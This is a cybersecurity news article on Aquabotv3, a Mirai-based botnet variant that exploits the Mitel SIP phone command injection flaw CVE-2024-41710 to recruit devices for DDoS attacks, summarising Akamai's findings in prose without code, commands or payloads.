New Aquabotv3 Botnet Malware Exploits Mitel Command Injection Vulnerability
January 30, 2025
Akamai's Security Intelligence and Response Team (SIRT) has identified a new variant of the Mirai-based botnet malware Aquabot, known as Aquabotv3, which is exploiting CVE-2024-41710, a command injection vulnerability in Mitel SIP phones. This is the third version of Aquabot that Akamai SIRT has tracked since the malware family was introduced in 2023. The latest variant has a unique feature that detects termination signals and communicates this information to its command-and-control (C2) server, a mechanism not commonly seen in botnets.
The vulnerability, CVE-2024-41710, affects Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones, commonly used across various sectors, including corporate offices, enterprises, government agencies, hospitals, educational institutes, hotels, and financial institutions. It is a medium-severity flaw that enables an authenticated attacker with administrative privileges to conduct an argument injection attack due to insufficient parameter sanitization during the boot process, leading to arbitrary command execution. Mitel issued fixes and a security advisory about this flaw on July 17, 2024, urging users to upgrade their systems.
Two weeks after Mitel's advisory, security researcher Kyle Burns published a proof-of-concept (PoC) on GitHub. Aquabotv3's exploitation of this PoC to launch attacks on CVE-2024-41710 is the first documented case of this vulnerability being exploited. 'Akamai SIRT detected exploit attempts targeting this vulnerability through our global network of honeypots in early January 2025 using a payload almost identical to the PoC,' the researchers reported.
The fact that these attacks require authentication suggests that the malware botnet employs brute-forcing to gain initial access. The attackers create an HTTP POST request aimed at the vulnerable endpoint 8021xsupport.html, which manages 802.1x authentication settings in Mitel SIP phones. The application incorrectly processes user input, permitting malformed data to be inserted into the phone's local configuration. Attackers manipulate the configuration file's parsing during device boot to execute a remote shell script from their server, which downloads and installs an Aquabot payload, sets its execution permissions, and then removes any traces.
Once established, Aquabotv3 connects to its C2 via TCP to receive instructions, attack commands, updates, or additional payloads. It then attempts to spread to other IoT devices using multiple vulnerabilities, including CVE-2018-17532, CVE-2023-26801, CVE-2022-31137, and CVE-2018-10562 / CVE-2018-10561. The malware also tries to brute force default or weak SSH/Telnet credentials to spread to poorly secured devices on the same network. Aquabotv3's primary objective is to add devices to its distribution denial of service (DDoS) swarm and use them to carry out various types of attacks. The botnet's operator promotes its DDoS capabilities on Telegram under various names, presenting it as a testing tool for DDoS mitigation measures.
Akamai has provided a list of the indicators of compromise (IoC) associated with Aquabotv3, as well as Snort and YARA rules for detecting the malware, in its report.
Related News
- Mirai Botnet Variant 'Aquabot' Targets Mitel Devices, Offers DDoS-as-a-Service
- Russian Hacker 'Matrix' Builds Powerful DDoS Botnet Using Publicly Available Tools
- Mirai Variant Exploits Tenda, Zyxel Devices for RCE, DDoS Attacks
Latest News
- Urgent Call to Secure Systems Against Ongoing Attacks Exploiting Microsoft Outlook RCE Vulnerability
- Critical Authentication Bypass Vulnerability in SonicOS: Proof-of-Concept Revealed
- CISA Adds Apple's Flaw to Known Exploited Vulnerabilities Catalog
- Mirai Botnet Variant 'Aquabot' Targets Mitel Devices, Offers DDoS-as-a-Service
- Critical Remote Code Execution Vulnerability Detected in Cacti Open-Source Framework
Like what you see?
Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.